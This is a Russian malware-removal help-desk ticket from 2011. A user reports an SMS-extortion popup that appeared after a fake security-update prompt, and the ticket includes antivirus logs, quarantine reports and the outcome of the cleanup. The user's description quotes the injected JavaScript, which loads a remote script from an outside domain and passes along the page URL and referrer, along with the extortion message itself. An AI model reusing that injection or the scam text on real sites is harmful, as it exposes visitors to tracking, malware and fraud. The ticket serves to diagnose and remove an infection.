-
Всплывающее окно в браузерах (заявка №92848)
Пользователь обратился в сервис 911, указав на следующие проблемы в работе его компьютера:
В браузере Opera появилось всплывающее окно с уведомлением об угрозе и предложением скачать обновление безопасности. В браузере FireFox появилось аналогичное окно. Я нажал в Opera согласиться после чего этот браузер повис и я завершил его работу. Вскоре после этого на всех сайтах стали появляться всплывающие окна следующего содержания:
zlo.rt.mipt.ru
Последний просмотр контента: 2011-06-28 23:21:23
Вход с ИП: **.***.*.** (мой ИП)
Город: *****(мой город)
Провайдер: **** (мой провайдер)
Оплатите, отправив смс с текстом 2262348568 на номер 3381.
Если смс не отправляется, отправьте смс
с тем же текстом на номер 3121.
Введите полученный в смс код:
Напоминание пропадет навсегда.
Вы можете закрыть данное напоминание нажав на кнопку закрыть
Напоминаем Вам, что Контент на нашем сайте платный и Вы подтвердили это согласившись с правилами. Ознакомившись с 10 бесплатными единицами контента, Вы так же просмотрели еще 0.
Если Вы не согласны оплатить, то мы готовы предоставить полные логи посещения нашего сайта, в котором с Вашего айпи был произведен вход и перед просмотром Вы ознакомились с правилами. Если Вы считаете, что логи принадлежат не Вам, сообщите по адресу [email protected]
СМС я естественно не отправлял а запустил проверку антивирусом. Антивирус ESET NOD 32 3.0.695.0 выдал нашел следующие угрозы:
28.06.2011 21:51:42 Фильтр HTTP файл http://vngue.ru/0000.zip модифицированный Java/Exploit.CVE-2010-0844.A троянская программа соединение прервано - изолирован Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Java\jre6\bin\java.exe.
28.06.2011 21:51:41 Фильтр HTTP файл http://vngue.ru/0000.zip модифицированный Java/Exploit.CVE-2010-0844.A троянская программа соединение прервано - изолирован SAGE\Dima Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Java\jre6\bin\java.exe.
Однако после сканирования проблема не пропала. Сегодняшнее сканирование результатов не дало.
Что я еще заметил (вдруг пригодится):
плагин NoScript успешно блокирует всплывающие окна но это полумера.
вирус подгружает всплывающее окно следующим javascript'ом
<script>if(self==top){
document.write("<script src='http" +
(("https:" == document.location.protocol) ? "s" : "") +
"://qocgle.com/loPtfdn3dSasoicn/js.php?t=stat&ran="+encodeURIComponent("QiGkg6f+UD O4hH0ZSZ74wGvxOOqU5PDPz8tqQ2su0IwFECbYdJ2PbWWLiTJa ZF/p")+"&r="+escape(document.referrer)+"&u="+escape(d ocument.URL)+"&v=351&"+Math.random()+"'>"+unescape ("%3C/script%3E"));}</script>
Дата обращения: 30.06.2011 1:11:59
Номер заявки: 92848
-
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Отчет о карантине
30.06.2011 2:20:09 на зараженном компьютере были обнаружены следующие вредоносные файлы:
- C:\\WINDOWS\\System32\\Drivers\\sptd.sys - подозрительный, обрабатывается вирлабом
- размер: 691696 байт
- дата файла: 30.08.2010 21:50:22
- версия: "1.62.0.0 built by: WinDDK"
- копирайты: "Copyright (C) 2004"
- C:\\WINDOWS\\System32\\Drivers\\sptd.sys - подозрительный, обрабатывается вирлабом
- размер: 691696 байт
- версия: "1.62.0.0 built by: WinDDK"
- копирайты: "Copyright (C) 2004"
-
-
Отчет о карантине
30.06.2011 12:30:08 на зараженном компьютере были обнаружены следующие вредоносные файлы:
- C:\\WINDOWS\\System32\\Drivers\\sptd.sys - подозрительный, обрабатывается вирлабом
- размер: 691696 байт
- дата файла: 30.08.2010 21:50:22
- версия: "1.62.0.0 built by: WinDDK"
- копирайты: "Copyright (C) 2004"
- C:\\WINDOWS\\system32\\vgcqtpe.dll - Trojan.Win32.Agent.nyzu
- размер: 57344 байт
- дата файла: 28.06.2011 21:51:46
- детект других антивирусов: DrWEB 6.0: Зловред Trojan.Mayachok.1; BitDefender: Зловред Trojan.Generic.6203310; Avast4: Зловред Win32:Dropper-HDL [Drp]
- C:\\WINDOWS\\system32\\vgcqtpe.dll - подозрительный, обрабатывается вирлабом
- размер: 691696 байт
- версия: "1.62.0.0 built by: WinDDK"
- копирайты: "Copyright (C) 2004"
-
-
Итог лечения
30.06.2011 12:32:59 лечение успешно завершено
-